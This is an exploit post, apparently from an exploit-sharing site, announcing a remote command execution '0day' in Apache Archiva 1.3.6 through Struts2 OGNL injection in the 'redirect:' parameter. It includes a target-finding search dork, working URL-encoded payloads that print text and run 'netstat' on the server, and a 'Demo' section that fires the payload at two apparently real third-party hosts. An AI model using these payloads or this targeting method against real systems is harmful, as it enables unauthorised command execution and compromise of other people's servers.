Apache Archiva 1.3.6 => Remote Command Execution 0day

Apache Archiva 1.3.6 => Remote Command Execution
####################################################################
Author: Kacper
Contact: info[at]devilteam.pl
Home Page: https://devilteam.pl/
####################################################################
Vendor: http://archiva.apache.org/
Dork: "Apache Archiva \ Browse Repository"

Description:
Apache Archiva use Apache Struts2:
"In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or
"redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression
against the value stack, this introduces the possibility to inject server side code."
In Apache Archiva can be use parameter redirect: for OGNL injection.

PoC:
(print devilteam.pl)

[php]http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27
com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println
%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}[/php]

{execute netstat)

[php]http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder
%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.
getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,
%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],
%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2
.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,
%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}[/php]

Demo:
[php]http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter
%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}[/php]

[php]http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensympho
ny.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.
println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}[/php]

Cheers:
cxsecurity.com
Bartek (ZUOO)
and all people from devilteam.pl

Reference:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
https://devilteam.pl/viewtopic.php?p=43506

发表评论